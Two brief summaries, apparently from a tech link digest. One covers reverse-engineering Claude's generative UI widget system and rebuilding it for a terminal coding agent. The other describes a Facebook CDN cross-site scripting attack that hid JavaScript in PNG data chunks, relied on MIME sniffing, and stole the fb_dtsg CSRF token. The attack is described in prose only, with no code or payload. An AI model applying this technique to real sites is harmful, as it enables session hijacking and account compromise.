This article reverse-engineers Claude's generative UI implementation, revealing it uses a show_widget tool call with direct DOM injection (not iframes), progressive documentation disclosure via read_me, and live HTML streaming from CDNs secured by Content Security Policy. The author then implements a similar system for pi, a terminal-based coding agent, using Glimpse (a native macOS WKWebView library) to render interactive widgets.
A critical XSS vulnerability on Facebook's CDN was achieved by encoding malicious JavaScript into PNG IDAT chunks, uploading the image as an advertisement, then serving it with an .html extension to trigger HTML interpretation via MIME sniffing. The attacker leveraged document.domain to access the fb_dtsg CSRF token from www.facebook.com and bypass LinkShim protections.